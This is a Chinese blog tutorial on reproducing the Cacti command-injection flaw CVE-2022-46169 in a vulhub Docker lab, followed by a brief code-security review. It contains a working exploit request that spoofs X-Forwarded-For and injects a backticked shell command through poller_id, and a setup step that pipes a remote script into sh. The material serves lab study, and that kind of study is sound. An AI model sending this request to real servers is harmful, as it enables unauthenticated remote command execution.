复现cacti的RCE(CVE-2022-46169)

已于 2025-07-30 12:10:04 修改
阅读量312 收藏 6
点赞数 3
CC 4.0 BY-SA版权
文章标签: 网络安全
于 2025-07-29 23:46:28 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/LOXOI/article/details/149752080

一、环境配置

1.1安装Docker

Linux

使用便捷脚本安装Docker:

curl -fsSL https://get.docker.com | sh

验证安装

验证Docker是否正确安装:

docker version

还要验证Docker Compose是否可用:

docker compose version

1.2拉取镜像

在 GitHub 上复制链接地址 vulhub。

 proproxychains git clone https://github.com/vulhub/vulhub

若没有设置代理则去掉proproxychains 拉取成功后,就能可以在本地看到 vulhub 文件夹: 

1.3启动容器 

进入 vulhub 文件夹内部的 cacti 文件内夹的 CVE-2022-46169 文件夹,在这里面输入命令:

 docker-compose up -d

 然后浏览器访问http://your-ip:8080会跳转到登录页面。使用admin/admin作为账号密码登录,并根据页面中的提示进行初始化。

 根据页面中的提示进行初始化。实际上初始化的过程就是不断点击“下一步”,直到安装成功:

这个漏洞的利用需要Cacti应用中至少存在一个类似是POLLER_ACTION_SCRIPT_PHP的采集器。所以,我们在Cacti后台首页创建一个新的Graph:

选择的Graph Type是“Device - Uptime”,点击创建:

1.4 配置断点调试

首先物理机的 VScode 要安装好以下插件: Remote-ssh、Docker、dev containers。 在使用 Vcode 远程连接虚拟机,连接容器的时候需要用到。

以上插件安装好之后的具体步骤如下:

创建容器:

docker exec -it <your-container>

安装Xdebug

pecl install xdebug-3.1.6
docker-php-ext-enable xdebug

编辑 /usr/local/etc/php/conf.d/docker-php-ext-xdebug.ini:

vi /usr/local/etc/php/conf.d/docker-php-ext-xdebug.ini

zend_extension=xdebug
xdebug.mode=debug
xdebug.start_with_request=yes
xdebug.client_port=9003
xdebug.client_host=host.docker.internal
xdebug.log=/tmp/xdebug.log

安装Cacti

apt update && apt install -y wget unzip
wget https://www.cacti.net/downloads/cacti-1.2.22.zip
unzip cacti-1.2.22.zip -d /var/www/html/
chown -R www-data:www-data /var/www/html/cacti-1.2.22

重启容器 

exit
docker restart cve-2022-46169_web_1

 使用 VScode 连接容器

 到这里环境就已经搭建好了

二、复现分析

2.1漏洞利用

完成上述初始化后,我们切换到攻击者的角色。作为攻击者,发送如下数据包:

GET /remote_agent.php?action=polldata&local_data_ids[0]=6&host_id=1&poller_id=`touch+/tmp/success` HTTP/1.1
X-Forwarded-For: 127.0.0.1
Host: localhost.lan
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1

 

2.2 安全方面

2.2.1 输入验证
  • 部分输入验证不足
    • 在 get_nfilter_request_var 和 get_filter_request_var 函数调用中,虽然有一些基本的过滤,但对于某些输入,如 oid 参数(在 get_snmp_data 和 get_snmp_data_walk 函数中),没有严格的验证。攻击者可能通过构造恶意的 OID 来进行攻击,例如利用 SNMP 漏洞进行信息泄露或拒绝服务攻击。
    • 在 run_remote_discovery 函数中,$network 参数只经过 get_filter_request_var 处理,没有对其进行严格的网络地址格式验证,可能会导致命令注入风险,因为该参数会被拼接到命令行中执行。
2.2.2 授权验证
  • IP 地址和主机名验证remote_client_authorized 函数通过比较客户端 IP 地址和主机名与数据库中存储的轮询器信息来进行授权验证。但这种验证方式存在一定的安全风险,因为主机名解析可能会受到 DNS 欺骗攻击的影响,攻击者可以通过伪造 DNS 响应来绕过授权验证。
2.2.3 命令注入风险
  • exec_background 和 exec_poll 调用:在 run_remote_discovery 函数中使用了 exec_background 函数执行命令,以及在 poll_for_data 函数中使用 exec_poll 执行脚本。如果输入参数没有经过严格的过滤和转义,可能会导致命令注入攻击。例如,攻击者可以通过构造恶意的输入来执行任意系统命令。
2.2.4 SQL 注入风险
  • 数据库查询:代码中使用了 db_fetch_row_prepared 和 db_fetch_assoc_prepared 等预处理语句,这在一定程度上避免了 SQL 注入风险。但需要确保这些预处理函数的实现是安全的,并且在其他未使用预处理语句的地方没有 SQL 注入漏洞。

 

LOXOI
关注
Cacti命令执行漏洞复现(CVE-2022-46169)
0xSec
02-02 4619
Cacti项目是一个开源平台,可为用户提供强大且可扩展的操作监控和故障管理框架。在1.2.22版本中存在一处命令注入漏洞,攻击者可以通过X-Forwarded-For请求头绕过服务端校验并在其中执行任意命令。漏洞编号:CVE-2022-46169,漏洞等级:严重。
(0day)Commvault 路径遍历导致远程代码执行漏洞复现CVE-2025-34028)
iSee857的博客
04-29 552
Commvault Command Center 创新版中存在一个路径遍历漏洞,允许未经身份验证的参与者上传 ZIP 文件,当目标服务器对其进行扩展时,可导致远程代码执行。(CVE-2025-34028)
CVE-2022-46169漏洞系统复现与分析
2301_79708753的博客
07-31 2076
本文系统全面的复现CVE-2022-46169漏洞,保姆级复现教程,其中涉及php代码审计,命令执行,身份绕过等等
Cacti 前台命令注入漏洞(CVE-2022-46169) vulhub漏洞复现
qq_53003652的博客
07-17 1144
在其1.2.17-1.2.22版本中存在一处命令注入漏洞,攻击者可以通过X-Forwarded-For请求头绕过服务端校验并在其中执行任意命令。的采集器,接下来创建一个新的图形,选择Device - Uptime”,点击创建。1.打开攻击机kali:192.168.126.130。靶机ubuntu:192.168.126.128。漏洞的利用需要Cacti应用中至少存在一个类似是。攻击机kali:192.168.126.130。账号密码为admin/admin。进入后一直点下一步进行初始化。
cacti漏洞CVE-2022-46169复现
weixin_59713645的博客
07-25 631
cactiRCE漏洞CVE-2022-46169复现。通过审计代码完整复现漏洞,还进一步把回显也实现了
漏洞复现-Cacti命令执行漏洞 (CVE-2022-46169)
玄道的网安博客
08-11 763
1.漏洞描述是一套基于PHP,MySQL,SNMP及RRDTool开发的网络流量监测图形分析工具,可为用户提供强大且可扩展的操作监控和故障管理框架。该漏洞存在于remote_agent.php文件中,未经身份验证的恶意攻击者可以通过设置HTTP_变量绕过身份验证,再通过构造特殊的$poller_id 参数来触发proc_open() 函数,成功利用此漏洞可在目标服务器上执行任意命令,获取服务器的控制权限。2.影响版本3.影响范围。
Cacti 未经身份验证的命令注入 CVE-2022-46169复现
aihua002的博客
12-12 462
再利用此漏洞之前,添加新的“graphs”,因为此漏洞需要POLLER_ACTION_SCRIPT_PHP的采集器。选择的Graph Type是“Device - Uptime”,点击创建。默认账户密码admin/admin。
【漏洞复现CVE-2022-46169 Cacti命令执行
m0_53121608的博客
07-13 802
【漏洞复现CVE-2022-46169 Cacti命令执行
CVE-2020-8813 Cacti v1.2.8 RCE.MD
04-13
CVE-2020-8813 Cacti v1.2.8 RCE
vulhub复现记录
书山有路勤为径,学海无涯苦作舟
10-16 2015
看作者下面的解释可以知道,自 2022 年 2 月起,作为 Docker Compose V2023 的子命令合并到 Docker 中,Python 版本的将在 年 月之后弃用。但是由于我之前在CentOS搭建了老的docker,所以就继续使用,老的docker-compose.其中遇到不少坑,就浅浅的记录一下吧。
Cacti命令执行漏洞分析 (CVE-2022-46169)
whoami
12-07 4451
Cacti是一套基于PHP,MySQL,SNMP及RRDTool开发的网络流量监测图形分析工具。在本漏洞中,攻击者可通过控制由get_nfilter_request_var()函数检索的参数$poller_id,以及构造local_data_ids参数,满足poller_item =POLLER_ACTION_SCRIPT_PHP条件,触发proc_open()函数,从而导致命令执行。Cacti < 1.2.23从漏洞补丁可以看出,本次漏洞点主要存在于lib/functions.php、remote_age
【春秋云境】 CVE-2022-24663复现
小高工作室
11-24 2644
远程代码执行漏洞,任何订阅者都可以利用该漏洞发送带有“短代码”参数设置为 PHP Everywhere 的请求,并在站点上执行任意 PHP 代码。直接访问http://eci-2zei2lxiq05pi7hyrjxd.cloudeci1.ichunqiu.com/fuck.php。提示任何订阅者都可以利用该漏洞发送带有“短代码”参数设置为 PHP Everywhere 的请求,并在站点上执行任意 PHP 代码。发现是个wp的后台。返回状态码为200表示成功。这里指的是任意PHP代码并且是任意位置。
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8742
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
TL3562-EVM-A1.1-001机械尺寸图.pdf
07-30
TL3562-EVM-A1.1-001机械尺寸图
No.121 基于博途1200PLC的脉冲除尘控制
最新发布
07-30
基于西门子1200PLC的智能脉冲除尘控制系统的开发与应用。首先展示了核心控制代码,解释了脉冲定时器(TON)和脉冲发生器(TP)的作用及其参数设置方法。接着阐述了多阀门循环控制逻辑,确保多个除尘阀按顺序工作并防止阀门冲突。文中还提到了脉冲冲突检测机制,避免因多个阀门同时打开而导致的气压骤降问题。最后分享了一些实用的调试技巧,如利用高速摄像机监控滤袋膨胀情况,以及在OB35循环中断组织块中进行50ms定时扫描以保持喷吹节奏的精确性。 适合人群:从事工业自动化领域的工程师和技术人员,特别是熟悉PLC编程和有志于提升脉冲除尘系统性能的专业人士。 使用场景及目标:适用于需要高效清除工业生产过程中产生的粉尘颗粒的企业。主要目标是提高除尘效率,减少设备维护成本,保障工人健康和环境保护。 阅读建议:读者可以通过本文深入了解博途1200PLC在脉冲除尘控制方面的具体应用,掌握关键技术和调试方法,从而更好地应用于实际工程项目中。
实验猴急他【45开5喔5培养5、】45‘’有5、
07-30
预扣、
vue-springboot基于Java的旧物置换小程序毕业论文和答辩ppt.rar
07-30
vue-springboot基于Java的旧物置换小程序毕业论文和答辩ppt.rar
基于光伏出力利用率的电动汽车充电站能量调度策略及程序注释详解
07-30
内容概要:本文探讨了考虑光伏出力利用率的电动汽车充电站能量调度策略。首先,构建了电动汽车充放电灵活度指标,用于评估电动汽车参与光伏充电站能量调度的能力。其次,根据不同运行模式(饥饿模式或饱和模式)制定了相应的电动汽车准入规则,以最大化光伏输出利用率和充电任务完成率。最后,根据电动汽车的充放电灵活度动态制定电价,以减少发电量波动带来的影响并提升光伏利用率。文章还介绍了该策略的主要贡献,包括提高电动汽车参与能量调度的能力、加强电动汽车与充电站的合作以及优化光伏利用率。 适合人群:对智能电网、电动汽车充电技术和可再生能源感兴趣的科研人员和技术开发者。 使用场景及目标:适用于研究和开发电动汽车充电站能量管理系统的机构和个人,旨在提高光伏利用率、优化充电任务完成率和促进新能源汽车发展。 其他说明:本文不仅提供了理论分析,还包括详细的程序注释,帮助读者深入理解具体实施方法。
基于Carsim和Simulink联合仿真的递推最小二乘法在线估计轮胎侧偏刚度 · Sensor Fusion
07-30
一种利用Carsim和Simulink联合仿真平台,采用递推最小二乘法(RLS)在线估计轮胎侧偏刚度的方法。文章首先介绍了联合仿真框架的搭建,包括选择合适的工况并设置数据传输接口。接着深入探讨了RLS算法的具体实现步骤,特别是如何处理离散状态变量以及观测矩阵的构造。文中还提到了一些常见的参数调整技巧如引入遗忘因子来稳定估计结果,并强调了保持数据同步的重要性。最后展示了仿真结果并与标准模型进行了比较,验证了方法的有效性和局限性。 适合人群:从事汽车控制系统研究的专业人士,尤其是关注轮胎特性建模及其应用的研究人员和技术人员。 使用场景及目标:适用于希望提高轮胎侧偏刚度估计精度的研究项目,旨在通过改进现有方法获得更加精确可靠的动态响应预测,从而优化整车性能。 其他说明:作者提供了完整的源代码供读者参考,并鼓励大家积极交流反馈意见以促进技术进步。此外,文中提到将固定车速改为实时获取可以显著改善估计效果,提醒开发者不要忽视细节对最终成果的影响。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值